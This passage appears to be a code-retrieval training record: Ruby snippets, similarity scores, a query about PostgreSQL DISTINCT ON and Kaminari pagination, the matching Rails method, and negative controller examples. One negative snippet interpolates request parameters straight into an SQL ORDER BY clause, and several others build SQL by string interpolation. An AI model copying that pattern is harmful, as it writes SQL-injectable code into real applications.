@sensorheight = args[:sensorheight] if args.key?(:sensorheight)\n @sensorwidth = args[:sensorwidth] if args.key?(:sensorwidth)\n @serialnumber = args[:serialnumber] if args.key?(:serialnumber)\n @serviceidentifier = args[:serviceidentifier] if args.key?(:serviceidentifier)\n @sharpness = args[:sharpness] if args.key?(:sharpness)\n @shutterspeedvalue = args[:shutterspeedvalue] if args.key?(:shutterspeedvalue)\n @software = args[:software] if args.key?(:software)\n @source = args[:source] if args.key?(:source)\n @sourcephotoscount = args[:sourcephotoscount] if args.key?(:sourcephotoscount)\n @spectralsensitivity = args[:spectralsensitivity] if args.key?(:spectralsensitivity)\n @state = args[:state] if args.key?(:state)\n @stitchingsoftware = args[:stitchingsoftware] if args.key?(:stitchingsoftware)\n @stripbytecounts = args[:stripbytecounts] if args.key?(:stripbytecounts)\n @stripoffsets = args[:stripoffsets] if args.key?(:stripoffsets)\n @subjectarea = args[:subjectarea] if args.key?(:subjectarea)\n @subjectcode = args[:subjectcode] if args.key?(:subjectcode)\n @subjectdistancerange = args[:subjectdistancerange] if args.key?(:subjectdistancerange)\n @subjectlocation = args[:subjectlocation] if args.key?(:subjectlocation)\n @subjectreference = args[:subjectreference] if args.key?(:subjectreference)\n @sublocation = args[:sublocation] if args.key?(:sublocation)\n @subsectime = args[:subsectime] if args.key?(:subsectime)\n @subsectimedigitized = args[:subsectimedigitized] if args.key?(:subsectimedigitized)\n @subsectimeoriginal = args[:subsectimeoriginal] if args.key?(:subsectimeoriginal)\n @supplementalcategory = args[:supplementalcategory] if args.key?(:supplementalcategory)\n @thresholding = args[:thresholding] if args.key?(:thresholding)\n @thumbnailer_build_cl = args[:thumbnailer_build_cl] if args.key?(:thumbnailer_build_cl)\n @timesent = args[:timesent] if args.key?(:timesent)\n @timezoneminutes = args[:timezoneminutes] if args.key?(:timezoneminutes)\n @timezoneoffset = args[:timezoneoffset] if args.key?(:timezoneoffset)\n @title = args[:title] if args.key?(:title)\n @transmissionreference = args[:transmissionreference] if 
args.key?(:transmissionreference)\n @type = args[:type] if args.key?(:type)\n @uniqueid = args[:uniqueid] if args.key?(:uniqueid)\n @uno = args[:uno] if args.key?(:uno)\n @urgency = args[:urgency] if args.key?(:urgency)\n @url = args[:url] if args.key?(:url)\n @usageterms = args[:usageterms] if args.key?(:usageterms)\n @usepanoramaviewer = args[:usepanoramaviewer] if args.key?(:usepanoramaviewer)\n @version = args[:version] if args.key?(:version)\n @webstatement = args[:webstatement] if args.key?(:webstatement)\n @whitebalance = args[:whitebalance] if args.key?(:whitebalance)\n @whitepoint = args[:whitepoint] if args.key?(:whitepoint)\n @width = args[:width] if args.key?(:width)\n @xmp4c = args[:xmp4c] if args.key?(:xmp4c)\n @xresolution = args[:xresolution] if args.key?(:xresolution)\n @ycbcrcoefficients = args[:ycbcrcoefficients] if args.key?(:ycbcrcoefficients)\n @ycbcrpositioning = args[:ycbcrpositioning] if args.key?(:ycbcrpositioning)\n @ycbcrsubsampling = args[:ycbcrsubsampling] if args.key?(:ycbcrsubsampling)\n @yresolution = args[:yresolution] if args.key?(:yresolution)\n end",
"def update!(**args)\n @bounding_poly = args[:bounding_poly] if args.key?(:bounding_poly)\n @confidence = args[:confidence] if args.key?(:confidence)\n @orientation = args[:orientation] if args.key?(:orientation)\n @text_anchor = args[:text_anchor] if args.key?(:text_anchor)\n end",
"def update_attributes(attrs)\n difference = attrs.keys - ASSIGNABLE\n if difference.empty?\n attributes.merge!(attrs)\n else\n raise \"unexpected attributes #{difference} for #{@node.path}\"\n end\n end",
"def attributes(*attrs)\n if attrs.size > 0\n attrs.each{|attr| attribute attr}\n end\n @attributes ||= []\n end",
"def update_attr_with_ial(attr, ial); end",
"def update!(**args)\n @confidence_threshold = args[:confidence_threshold] if args.key?(:confidence_threshold)\n @f1_score = args[:f1_score] if args.key?(:f1_score)\n @precision = args[:precision] if args.key?(:precision)\n @recall = args[:recall] if args.key?(:recall)\n end",
"def update!(**args)\n @confidence_threshold = args[:confidence_threshold] if args.key?(:confidence_threshold)\n @f1_score = args[:f1_score] if args.key?(:f1_score)\n @precision = args[:precision] if args.key?(:precision)\n @recall = args[:recall] if args.key?(:recall)\n end",
"def update!(**args)\n @confidence_threshold = args[:confidence_threshold] if args.key?(:confidence_threshold)\n @f1_score = args[:f1_score] if args.key?(:f1_score)\n @precision = args[:precision] if args.key?(:precision)\n @recall = args[:recall] if args.key?(:recall)\n end",
"def update!(**args)\n @devices = args[:devices] if args.key?(:devices)\n @low_confidence_reason = args[:low_confidence_reason] if args.key?(:low_confidence_reason)\n @result_confidence_level = args[:result_confidence_level] if args.key?(:result_confidence_level)\n end",
"def attr_set_ub1(attr_type, attr_value)\n #This is a stub, used for indexing\n end"
] |
[
"0.56544054",
"0.55829805",
"0.54594475",
"0.5393491",
"0.53762305",
"0.53650975",
"0.5343607",
"0.53413194",
"0.5340676",
"0.5314551",
"0.52878195",
"0.52488434",
"0.5241535",
"0.5241535",
"0.5241535",
"0.5241535",
"0.52374434",
"0.5222989",
"0.5191321",
"0.51482415",
"0.5139337",
"0.5130463",
"0.5127423",
"0.5127423",
"0.51151866",
"0.5114251",
"0.50946224",
"0.5079683",
"0.5071826",
"0.5066055",
"0.5059038",
"0.5052428",
"0.5046401",
"0.5045636",
"0.5045267",
"0.5044739",
"0.50391054",
"0.50360554",
"0.50324625",
"0.49841398",
"0.49819756",
"0.49733967",
"0.49690604",
"0.49530774",
"0.4937246",
"0.4935687",
"0.49325368",
"0.49280098",
"0.49272668",
"0.49249175",
"0.49234805",
"0.4916887",
"0.4916887",
"0.49099466",
"0.49089584",
"0.49081978",
"0.49076",
"0.4904821",
"0.49044117",
"0.4903292",
"0.4903292",
"0.4899585",
"0.48942068",
"0.4884563",
"0.48840442",
"0.48825473",
"0.4881596",
"0.4875226",
"0.48732978",
"0.48704112",
"0.48668304",
"0.4865016",
"0.48647627",
"0.48603073",
"0.4853664",
"0.48507464",
"0.48495448",
"0.48340183",
"0.48123083",
"0.48102814",
"0.4808742",
"0.48022538",
"0.47985113",
"0.47985113",
"0.4796122",
"0.47884014",
"0.4786589",
"0.4783268",
"0.47828484",
"0.47803771",
"0.47748858",
"0.47739354",
"0.4765524",
"0.4765483",
"0.47629264",
"0.47535536",
"0.47533515",
"0.47533515",
"0.47533515",
"0.4741946",
"0.47402596"
] |
0.0
|
-1
|
Main method for results. We use an additional wrapper to mitigate Kaminari / RoR problems with PostgreSQL DISTINCT ON (pagination is broken without it)
|
def events
RoyalEvent::Event.where(
"id IN (#{subquery.to_sql})"
).order(default_order)
end
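A minimal sketch of the two helpers the method above relies on; subquery, default_order, and the group_key/starts_at columns are not part of the original snippet and are assumptions here. The reason for the wrapper: Kaminari paginates with COUNT plus LIMIT/OFFSET, which PostgreSQL's DISTINCT ON queries do not survive, so the DISTINCT ON work is pushed into an inner query and the outer relation is a plain "id IN (...)" lookup that Kaminari can count and page safely.

def subquery
  # Hypothetical inner relation: one row per group_key, newest event kept.
  # DISTINCT ON requires the ORDER BY to start with the DISTINCT ON column.
  RoyalEvent::Event
    .select("DISTINCT ON (group_key) id")
    .order(:group_key, starts_at: :desc)
end

def default_order
  # Hypothetical ordering for the outer query, free to differ from the
  # inner DISTINCT ON ordering.
  { starts_at: :desc }
end

# Usage sketch: events.page(params[:page]).per(25) paginates correctly,
# since the outer relation carries no DISTINCT ON of its own.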
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def index\n #@data = Datum.all\n @q = Datum.search(params[:q])\n @data = @q.result(distinct: true).page(params[:page]).per(20)\n end",
"def index\n @q = User.search(params[:q])\n @users = @q.result(:distinct => true).order(sort_column + ' ' + sort_direction).paginate(:page => params[:page])\n# @users = User.order(sort_column + ' ' + sort_direction).paginate(:per_page => 10, :page => params[:page])\n @q.build_condition\n \n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @users }\n end\n end",
"def get_list_of_records(klass, options = {}, &block)\n items = klass.name.tableize\n self.current_page = options[:page] if options[:page]\n query = options[:query] if options[:query]\n category = options[:category] if options[:category]\n pagination = options[:pagination].nil? ? true : options[:pagination] \n date = options[:date] if options[:date]\n #date_range = options[:date_range] if options[:date_range]\n start_date = options[:start_date] if options[:start_date]\n end_date = options[:end_date] if options[:end_date]\n sort_fields = options[:sort] if options[:sort]\n sort_dir = options[:dir] || \"ASC\"\n per_page = options[:per_page] if options[:per_page]\n\n #self.current_query = options\n records = {\n :user => @current_user #,\n # :order => @current_user.pref[:\"#{items}_sort_by\"] || klass.sort_by\n }\n\n # Use default processing if no hooks are present. Note that comma-delimited\n # export includes deleted records, and the pagination is enabled only for\n # plain HTTP, Ajax and XML API requests.\n wants = request.format\n filter = session[options[:filter]].to_s.split(',') if options[:filter]\n scope = klass.scoped\n scope = scope.category(category) if category.present?\n scope = scope.state(filter) if filter.present?\n scope = scope.search(query) if query.present?\n scope = scope.at_date(date) if date.present?\n #scope = scope.between_dates(date_range) if date_range.present?\n scope = scope.between_dates(start_date, end_date) if (start_date.present? && end_date.present?)\n\n if sort_fields.present?\n words = sort_fields.split(\".\")\n if words.length > 1\n table = words.shift.tableize # popup first item\n field = words.join(\".\")\n sort_fields2 = \"#{table}.#{field}\" \n else\n sort_fields2 = \"#{items}.#{words.first}\"\n end\n scope = scope.order_by(sort_fields2, sort_dir)\n end\n\n scope = yield scope if block_given?\n scope = scope.unscoped if wants.csv?\n scope = scope.page(current_page).per(per_page)\n scope\n end",
"def paginator; end",
"def index\n @search = Ad.search(params[:q])\n @result = @search.result\n @ads = @result.order('created_at DESC').distinct\n @ads = @result.page(params[:page]).per(15)\n\n respond_to do |format|\n format.html\n end\n end",
"def playing_with(num=10)\n return [] if not page_id or page_id==0\n \nsql = <<-SQL\n select terms.*\n from terms, matches matches1,matches matches2 \n where terms.id=matches2.term_id \n and matches2.page_id=matches1.page_id \n and matches1.date_for_sorting = matches2.date_for_sorting\n and matches1.id=#{id}\n and matches2.id<>#{id}\n and matches2.status='notified'\n group by terms.text\n limit #{num}\n SQL\n terms = Term.find_by_sql(sql) \n Term.uniques(terms)\n end",
"def index\n @products = Product.all\n\n # @search = Product.search(params[:q])\n # @products = @search.result(distinct: true)\n\n # @search = Product.search(params[:q])\n # @products = @search.result(:distinct => true).paginate(:page => params[:page], :per_page=>100)\n \n #@product = Product.new \n # @search = Article.search(params[:search])\n # @articles = @search.all\n end",
"def index\n user_works = Work.joins(:pseuds => :user).where(\"users.id = ?\", @user.id)\n work_query = user_works.joins(:taggings).\n joins(\"inner join tags on taggings.tagger_id = tags.id AND tags.type = 'Fandom'\").\n select(\"distinct tags.name as fandom, \n works.id as id, \n works.title as title, \n works.revised_at as date,\n works.word_count as word_count\")\n\n # sort \n \n # NOTE: Because we are going to be eval'ing the @sort variable later we MUST make sure that its content is \n # checked against the whitelist of valid options\n sort_options = \"\"\n @sort = \"\"\n if current_user.preference.hide_hit_counts\n sort_options = %w(kudos.count comments.count bookmarks.count subscriptions.count word_count)\n @sort = sort_options.include?(params[:sort_column]) ? params[:sort_column] : \"kudos.count\"\n else\n sort_options = %w(hits date kudos.count comments.count bookmarks.count subscriptions.count word_count)\n @sort = sort_options.include?(params[:sort_column]) ? params[:sort_column] : \"hits\"\n end\n \n @dir = params[:sort_direction] == \"ASC\" ? \"ASC\" : \"DESC\"\n params[:sort_column] = @sort\n params[:sort_direction] = @dir\n\n # gather works and sort by specified count\n @years = [\"All Years\"] + user_works.value_of(:revised_at).map {|date| date.year.to_s}.uniq.sort\n @current_year = @years.include?(params[:year]) ? params[:year] : \"All Years\"\n if @current_year != \"All Years\"\n start_date = DateTime.parse(\"01/01/#{@current_year}\")\n end_date = DateTime.parse(\"31/12/#{@current_year}\")\n work_query = work_query.where(\"works.revised_at >= ? AND works.revised_at <= ?\", start_date, end_date)\n end\n # NOTE: eval is used here instead of send only because you can't send \"bookmarks.count\" -- avoid eval\n # wherever possible and be extremely cautious of its security implications (we whitelist the contents of\n # @sort above, so this should never contain potentially dangerous user input)\n works = work_query.all.sort_by {|w| @dir == \"ASC\" ? (eval(\"w.#{@sort}\") || 0) : (0 - (eval(\"w.#{@sort}\") || 0).to_i)} \n\n # on the off-chance a new user decides to look at their stats and have no works\n if works.blank?\n render \"no_stats\" and return\n end\n \n # group by fandom or flat view\n if params[:flat_view]\n @works = {ts(\"All Fandoms\") => works.uniq}\n else\n @works = works.group_by(&:fandom)\n end\n \n # gather totals for all works\n @totals = {}\n (sort_options - [\"date\"]).each do |value|\n # see explanation above about the eval here\n # the inject is used to collect the sum in the \"result\" variable as we iterate over all the works\n @totals[value.split(\".\")[0].to_sym] = works.uniq.inject(0) {|result, work| result + (eval(\"work.#{value}\") || 0)} # sum the works\n end\n @totals[:author_subscriptions] = Subscription.where(:subscribable_id => @user.id, :subscribable_type => 'User').count\n\n # graph top 5 works\n @chart_data = GoogleVisualr::DataTable.new \n @chart_data.new_column('string', 'Title')\n chart_col = @sort == \"date\" ? \"hits\" : @sort\n chart_col_title = chart_col.split(\".\")[0].titleize == \"Comments\" ? ts(\"Comment Threads\") : chart_col.split(\".\")[0].titleize\n chart_title = @sort == \"date\" ? 
ts(\"Most Recent\") : ts(\"Top Five By #{chart_col_title}\")\n @chart_data.new_column('number', chart_col_title)\n \n # Add Rows and Values \n # see explanation above about the eval here\n @chart_data.add_rows(works.uniq[0..4].map {|w| [w.title, eval(\"w.#{chart_col}\")]})\n\n # image version of bar chart\n # opts from here: http://code.google.com/apis/chart/image/docs/gallery/bar_charts.html\n @image_chart = GoogleVisualr::Image::BarChart.new(@chart_data, {:isVertical => true}).uri({\n :chtt => chart_title,\n :chs => \"800x350\",\n :chbh => \"a\",\n :chxt => \"x\",\n :chm => \"N,000000,0,-1,11\"\n })\n\n @chart = GoogleVisualr::Interactive::ColumnChart.new(@chart_data, :title => chart_title)\n \n end",
"def index\n @limit = params[:limit] || 200\n @page = params[:page] || 1\n \n @publications = Publication.active\n\n if params[:themes]\n #@publications = @publications.where(:themes => )\n end\n\n if valid? :keyword\n sql = Keyword.subquery(params[:keyword].split(/\\s+/))\n #@publications = @publications.where(\"#{Publication.table_name}.citation_id IN (#{sql})\")\n##{Publication.table_name}.citation_id IN (#{sql}) \n params[:keyword].split(/\\s+/).each do |word|\n @publications = @publications.where(\n \"lower(keywords) like ? OR lower(authors) LIKE ? OR lower(title) LIKE ?\", \"%#{word.downcase}%\", \"%#{word.downcase}%\", \"%#{word.downcase}%\")\n end\n end\n\n if valid? :themes\n sql = Keyword.theme_subquery(params[:themes])\n @publications = @publications.where(\"#{Publication.table_name}.citation_id IN (#{sql})\")\n end\n\n quads = params[:quadrangles].map {|v| v.empty? ? nil : v }.compact if params[:quadrangles]\n unless quads.nil? or quads.empty?\n sql = QuadrangleSearch.subquery(:all, params[:quadrangles])\n @publications = @publications.where(\"#{Publication.table_name}.citation_id IN (#{sql})\")\n end\n\n unless params[:agency].nil? or params[:agency].empty?\n @publications = @publications.where(\"LOWER(#{Publication.table_name}.publisher) = ?\", params[:agency].downcase)\n end\n\n unless params[:year_from].nil? or params[:year_from].empty?\n @publications = @publications.where(\"publication_year >= ?\", params[:year_from])\n end\n\n unless params[:year_to].nil? or params[:year_to].empty?\n @publications = @publications.where(\"publication_year <= ?\", params[:year_to])\n end\n\n if valid? :scale_from\n @publications = @publications.where(\"#{Outline.table_name}.map_scale_denominator >= ?\", params[:scale_from].to_i)\n end\n if valid? :scale_to\n @publications = @publications.where(\"#{Outline.table_name}.map_scale_denominator <= ?\", params[:scale_to].to_i)\n end\n\n unless (valid? :statewide and params[:statewide] == 'on')\n logger.info \"Include statewide\"\n @publications = @publications.where(\"#{Outline.table_name}.outline_source IN (?)\", ['Map Extent', 'Map Outline'])\n end\n\n unless params[:aoi_geographic].blank?\n @aoi_geographic = GeoRuby::SimpleFeatures::Polygon.from_ewkt(params[:aoi_geographic])\n @aoi_geographic.srid = 4326;\n @bounds = @aoi_geographic.envelope\n end\n\n unless params[:aoi].blank?\n @aoi = GeoRuby::SimpleFeatures::Polygon.from_ewkt(params[:aoi])\n @aoi.srid = 3338;\n\n @publications = @publications.where(\n \"SDO_RELATE(#{Outline.table_name}.geometry, #{@aoi.as_sdo_rectangle}, 'mask=ANYINTERACT querytype = WINDOW') = 'TRUE'\"\n )\n end\n\n @selected = params[:selected].split(',').map(&:to_i) unless params[:selected].blank?\n if @selected and params[:selected_only]\n @publications = @publications.where(:citation_id => @selected)\n end\n \n unless params[:sort].blank?\n @publications = @publications.order(\"#{params[:sort]} #{params[:dir]}\")\n end\n\n respond_to do |format|\n format.pdf do\n render :pdf => 'publications', \n :layout => 'pdf.html', \n :footer => {\n :left => \"Generated: #{Time.now.strftime('%F %T')}\", \n :right => '[page]/[toPage]',\n :line => true\n }\n end\n format.all do\n @publications = @publications.paginate(:page => @page, :per_page => @limit)\n end\n end\n end",
"def index\n\n # gather data for pull down lists\n @collections = Collection.select_list\n @periods = Period.select_list\n @genres = Subject.genres.where(['subject_translations.locale=?', :en.to_s]).order('subject_translations.name')\n \n @page = params[:page] || 1\n @per_page = params[:per_page] || Item.per_page || 100\n\n @sort_field = params[:c] ||= 'items.id'\n @order = sort_order('items.id') unless @sort_field == 'title_en' || @sort_field == 'title_fa'\n\n # look for filters\n @keyword_filter = params[:keyword_filter] unless params[:keyword_filter] == I18n.translate(:search_prompt)\n @collection_filter = params[:collection_filter]\n @period_filter = params[:period_filter]\n @genre_filter = params[:genre_filter]\n\n # unless @keyword_filter.nil? && @collection_filter.nil? && period_filer.nil? && subject_type_filter.nil?\n\n @query_hash = { :conditions => [], :parameters => { } }\n @query_hash = build_collection_query(@collection_filter, @query_hash) unless @collection_filter.nil? || @collection_filter == 'all'\n @query_hash = build_period_query(@period_filter, @query_hash) unless @period_filter.nil? || @period_filter == 'all'\n # @query_hash = build_person_query(@person_filter, @query_hash) unless @person_filter.nil? || @person_filter == 'all'\n # @query_hash = build_subject_query(@subject_filter, @query_hash) unless @subject_filter.nil? || @subject_filter == 'all'\n # @query_hash = build_place_query(@place_filter, @query_hash) unless @place_filter.nil? || @place_filter == 'all'\n @query_hash = build_genre_query(@genre_filter, @query_hash) unless @genre_filter.nil? || @genre_filter == 'all'\n @query_hash = build_keyword_query(@keyword_filter, @query_hash) unless @keyword_filter.blank? || @keyword_filter == I18n.translate(:search_prompt)\n\n # assemble the query from the two sql injection safe parts\n @query_conditions = ''\n @query_hash[:conditions].each do |condition|\n @query_conditions += (@query_conditions.blank? ? '': ' AND ') + condition\n end\n\n @query = [@query_conditions, @query_hash[:parameters]]\n\n @items = Item.where(@query).order(@order)\n\n @items = sort_bilingual(@items, params[:c], params[:d]) if [\"title_en\", \"title_fa\"].include?params[:c]\n\n #cache the current search set in a session variable\n session[:current_items] = @items.map { |i| i.id }\n session[:items_sort_field] = params[:c]\n session[:items_direction] = params[:d]\n session[:items_order] = @order\n\n @items_full_set = @items\n @items = @items.paginate :per_page => @per_page, :page => @page, :order => @order\n\n #cache the current search set in a session variable\n session[:admin_items_index_url] = request.fullpath\n\n respond_to do |format|\n format.html # index.html.erb\n format.csv do\n csv_string = make_custom_csv(@items_full_set)\n # send it to the browsah\n send_data csv_string,\n :type => 'text/csv; charset=utf-8; header=present',\n :disposition => \"attachment; filename=items.csv\"\n end\n format.xml { render :xml => @items_full_set }\n end\n end",
"def index\n results = @search.result(distinct: true)\n if params[:customer_id]\n results = results.where(customer_id: params[:customer_id])\n end\n results = results.tagged_with(params[:tags].split(/\\s*,\\s*/)) if params[:tags].present?\n results = results.includes :series\n results.paginate(page: params[:page], per_page: 20)\n\n set_listing results.paginate(page: params[:page], per_page: 20)\n\n end",
"def index\n# @entries = Entry.order('lower(de)')\n @q = Entry.order('lower(de)').ransack(params[:q])\n @entries = @q.result(distinct: true)\n end",
"def resultset; end",
"def index\n # @backend_users = User.all\n @search = User.order(created_at: :desc).search(params[:q])\n @backend_users = @search.result(:distinct => true)\n @backend_users = @backend_users.page(params[:page])\n end",
"def results\n @results ||= begin\n _dataset = filtered_dataset.limit(per_page).offset(start)\n\n if sort_by\n options = self.class.sortable_attribute_options(sort_by.to_s)\n order =\n if sort_order == \"DESC\"\n Sequel.desc(sort_by.to_sym, options)\n else\n Sequel.asc(sort_by.to_sym, options)\n end\n _dataset = _dataset.order(order)\n end\n\n _dataset.all\n end\n end",
"def query_all(args = {})\n query(args.merge(select: \"DISTINCT #{model.table_name}.*\"))\n end",
"def index\n @search = Article.search(params[:q])\n @articles = params[:distinct].to_i.zero? ? @search.result : @search.result(distinct: true)\n\n respond_with @articles\n end",
"def index\n @q = Candidato.paginate(page: params[:page]).search(params[:q])\n @candidatos = @q.result(:distinct => true)\n\n respond_to do |format|\n format.html # index.html.erb\n format.json { render json: @candidatos }\n end\n end",
"def process_subquery_grid(opts = {})\n klass = opts[:klass] || nil\n column_defs = opts[:column_defs] || nil\n q = opts[:q] || nil\n page = opts[:page] || DEFAULT_PAGE\n per_page = opts[:per_page] || DEFAULT_PER_PAGE\n sort_info = opts[:sort_info] || DEFAULT_SORT_INFO\n field_lookup = opts[:field_lookup] || {}\n inner_join_query = opts[:inner_join_query] || nil\n inner_where_query = opts[:inner_where_query] || nil\n inner_group_query = opts[:inner_group_query] || nil\n\n # Enforce default values\n page ||= DEFAULT_PAGE\n per_page ||= DEFAULT_PER_PAGE\n sort_info ||= DEFAULT_SORT_INFO\n\n # Parse parameters into correct format\n column_defs = parse_params(column_defs)\n page = page.to_i\n per_page = per_page.to_i\n sort_info = parse_params(sort_info)\n\n # Check for client errors\n raise \"Invalid per_page parameter. Valid values are #{VALID_PER_PAGES}\" unless (VALID_PER_PAGES).include? per_page\n sort_info ||= {}\n\n # inner query\n inner_select_query = process_select(klass, column_defs, field_lookup)\n inner_select_query += \", #{klass.table_name}.#{inner_group_query} AS #{inner_group_query}\" unless inner_group_query.blank?\n inner_query = %{\n SELECT\n #{inner_select_query}\n FROM\n #{klass.table_name}\n }\n inner_query += \" #{inner_join_query}\" unless inner_join_query.blank?\n inner_query += \" WHERE #{inner_where_query}\" unless inner_where_query.blank?\n inner_query += \" GROUP BY #{inner_group_query}\" unless inner_group_query.blank?\n\n # outer query\n outer_query = %{\n SELECT *\n FROM\n (#{inner_query}) AS internal\n }\n\n # filter & order\n filtered_query = outer_query\n where_query = process_where(column_defs, q, field_lookup, true)\n filtered_query += \" WHERE #{where_query}\" unless where_query.blank?\n order_query = process_order(sort_info, field_lookup)\n filtered_query += \" ORDER BY #{order_query}\" unless order_query.blank?\n\n # pagination\n objects = klass.paginate_by_sql(filtered_query, page: page, per_page: per_page)\n\n objects\n end",
"def query_without_paging_sorting\n query = @initial_query.dup\n\n # restrict to select columns\n query = query_projection(query)\n\n #filter\n query_filter(query)\n end",
"def index\n # @entries = Entry.all\n @search.sorts = ['term desc', 'created_at desc'] if @search.sorts.empty?\n @search_term = params[:q]\n @entries = @search\n .result(distinct: true)\n .includes(:definitions)\n .page(params[:page])\n .per(params[:per_page])\n\n\n 1\n end",
"def index\n\n @publications = Publication.all.includes(:region, :commune, :publication_attachments) #Bulllet\n @publications = @publications.by_title(params[:search_title]) if params[:search_title].present?\n @publications = @publications.by_type(params[:search_type]) if params[:search_type].present?\n @publications = @publications.by_address(params[:search_address]) if params[:search_address].present?\n @publications = @publications.by_region(params[:search_region]) if params[:search_region].present?\n @publications = @publications.by_commune(params[:search_commune]) if params[:search_commune].present?\n @publications = @publications.by_address2(params[:search_address2]) if params[:search_address2].present?\n @publications = @publications.by_region2(params[:search_region2]) if params[:search_region2].present?\n @publications = @publications.by_commune2(params[:search_commune2]) if params[:search_commune2].present?\n @publications = @publications.by_width_min(params[:width_min]) if params[:width_min].present?\n @publications = @publications.by_width_max(params[:width_max]) if params[:width_max].present?\n @publications = @publications.by_length_min(params[:length_min]) if params[:length_min].present?\n @publications = @publications.by_length_max(params[:length_max]) if params[:length_max].present?\n @publications = @publications.by_height_min(params[:height_min]) if params[:height_min].present?\n @publications = @publications.by_height_max(params[:height_max]) if params[:height_max].present?\n @publications = @publications.by_latitude_min(params[:latitude_min]) if params[:latitude_min].present?\n @publications = @publications.by_latitude_max(params[:latitude_max]) if params[:latitude_max].present?\n @publications = @publications.by_longitude_min(params[:longitude_min]) if params[:longitude_min].present?\n @publications = @publications.by_longitude_max(params[:longitude_max]) if params[:longitude_max].present?\n end",
"def search\n @core_search.joins(:name_status)\n .select('max(name.id) id')\n .select('max(name.simple_name) simple_name')\n .select('max(name.full_name) full_name')\n .select('max(name.full_name_html) full_name_html')\n .select('tree_element.excluded')\n .select('max(name_status.id) name_status_id')\n .select('max(name_status.name) name_status_name_')\n .select('instance_type.misapplied')\n .select('instance_type.pro_parte')\n .select('max(names_instance.full_name) cross_referenced_full_name')\n .select('null cross_reference_misapplication_details')\n .select('max(names_instance.id) cross_referenced_full_name_id')\n .select('max(instance.id) instance_id')\n .select('max(citer_instances_instance.id) citers_instance_id')\n .select('max(tree_version_element.name_path) name_path')\n .select('null profile')\n .select('null synonyms')\n .select('true cross_reference')\n .select('max(names_instance.full_name_html) cross_ref_full_name_html')\n .select('instance_type.doubtful')\n .select('max(reference.citation) reference_citation')\n .group(main_group_by_columns)\n .limit(@parser.limit)\n .offset(@parser.offset)\n .order(' full_name ')\n end",
"def test_get_all_with_pagination\n # CASE 01: Mention of start_index and max_results\n # CASE 02: Mention of Order by with direction\n # CASE 03: Mention of Order by without direction\n # CASE 04: Mention a condition also\n # CASE 05: Getting only details of an entity\n \n user = User.find_by_id(@db1_admin_user_id)\n \n parent_resource = :entity_id\n parent_id = 100\n start_index = 10\n max_results = 10\n order_by = 'name'\n direction = 'DESC'\n table_name = 'instances'\n conditions = 'database_id=6'\n total_records = 0\n conditions = 'id=50'\n \n start_index = 0\n max_results = 1\n conditions = \"entity_id=#{parent_id}\"\n total_records = Instance.count_by_sql \"SELECT COUNT(*) FROM #{table_name} WHERE #{conditions}\"\n #########################################################\n # CASE 01\n # Mention of start_index and max_results\n #########################################################\n get :index, {\n parent_resource => parent_id,\n :format => 'json', \n :start_index => start_index, \n :max_results => max_results},\n {'user' => user}\n \n #assert_equal '', @response.body\n assert_response 200\n result = @response.body\n\n result = JSON.parse(result)\n\n assert_equal max_results, result['resources'].length\n assert_equal total_records, result['total_resources'].to_i\n \n \n order_by = 'name'\n direction = 'desc'\n start_index = 0\n max_results = 10\n #########################################################\n # CASE 02\n # Mention of order by with direction\n #########################################################\n get :index, {\n parent_resource => parent_id,\n :format => 'json', \n :start_index => start_index, \n :max_results => max_results,\n :order_by => order_by,\n :direction => direction\n },\n {'user' => user}\n \n #assert_equal '', @response.body\n assert_response 200\n result = @response.body\n\n result = JSON.parse(result)\n\n assert_equal 2, result['resources'].length\n assert_equal 'desc', result['direction']\n #assert_equal 201, result['resources'][0]['url'].chomp('.json')[/\\d+$/].to_i\n \n #########################################################\n # CASE 03\n # Mention of order by without direction\n #########################################################\n get :index, {\n parent_resource => parent_id,\n :format => 'json', \n :start_index => start_index, \n :max_results => max_results,\n :order_by => order_by,\n #:direction => direction\n },\n {'user' => user}\n \n #assert_equal '', @response.body\n assert_response 200\n result = @response.body\n\n result = JSON.parse(result)\n\n assert_equal 2, result['resources'].length\n assert_equal 'asc', result['direction']\n #assert_equal 200, result['resources'][0]['url'].chomp('.json')[/\\d+$/].to_i\n \n# FIXME: Following two tests always fail either in isolation or\n# in a complete execution of the tests due to disabling transactional fixtuers \n# start_index = 0\n# max_results = 10\n# order_by = 'name'\n# conditions = \"category='Fiction'\"\n# #########################################################\n# # CASE 04\n# # Mention of order by specifying condition\n# #########################################################\n# get :index, {\n# parent_resource => parent_id,\n# :format => 'json', \n# :start_index => start_index, \n# :max_results => max_results,\n# :order_by => order_by,\n# :conditions => conditions\n# },\n# {'user' => user}\n# #assert_equal '', @response.body\n# assert_response 200\n# result = @response.body\n# result = JSON.parse result\n# assert_equal 1, result['resources'].length\n# assert_equal 'asc', 
result['direction']\n# #assert_equal 201, result['resources'][0]['url'].chomp('.json')[/\\d+$/].to_i\n# \n# conditions = \"category='Computer Science' AND name='Compiler, Principles, Tools and Techniques'\"\n# #########################################################\n# # CASE 05\n# # Mention of compound conditions\n# #########################################################\n# get :index, {\n# parent_resource => parent_id,\n# :format => 'json', \n# :start_index => start_index, \n# :max_results => max_results,\n# :order_by => order_by,\n# :conditions => conditions\n# },\n# {'user' => user}\n# assert_equal '', @response.body\n# assert_response 200\n# result = @response.body\n# result = JSON.parse result\n# assert_equal 1, result['resources'].length\n# assert_equal 'asc', result['direction']\n# assert_equal 200, result['resources'][0]['url'].chomp('.json')[/\\d+$/].to_i\n \n \n end",
"def index_dm\n # http://stackoverflow.com/questions/12429429/datamapper-sorting-results-through-association\n #startime = Time.at 0\n #endtime = DateTime.now\n #range = (startime..endtime)\n # ps = Package.all(:order => [DataMapper::Query::Direction.new(Event.properties[:timestamp])], :links =>[:events])\n # @packages = ps.paginate(page: params[:page]) \n # @packages= Package.all(Package.events.timestamp => range, :fields => [ Package.events.timestamp], :unique => true, :order => [ Package.events.timestamp.desc ]).paginate(page: params[:page])\n # @packages = Package.ordered_by_timestamp(:desc).all.paginate(page: params[:page]) \n # @packages = Package.find_by_sql(\"SELECT p.id, e.timestamp from packages as p, events as e where p.id = e.package_id order by e.timestamp \")\n sort = DataMapper::Query::Operator.new(sort_column, sort_direction)\n if (params[:id_search] && !params[:id_search].empty?)\n #ps = Sip.all(:name.like => params[:id_search]).packages.events.all(:order => [sort]).packages | \n ps = Package.all(:id.like => params[:id_search], :order => [sort])\n @packages = ps#.paginate(page: params[:page])\n else\n # filter on activity\n names = \n case params[:activity_search]\n when 'submitted'\n \"submit\"\n when 'rejected'\n 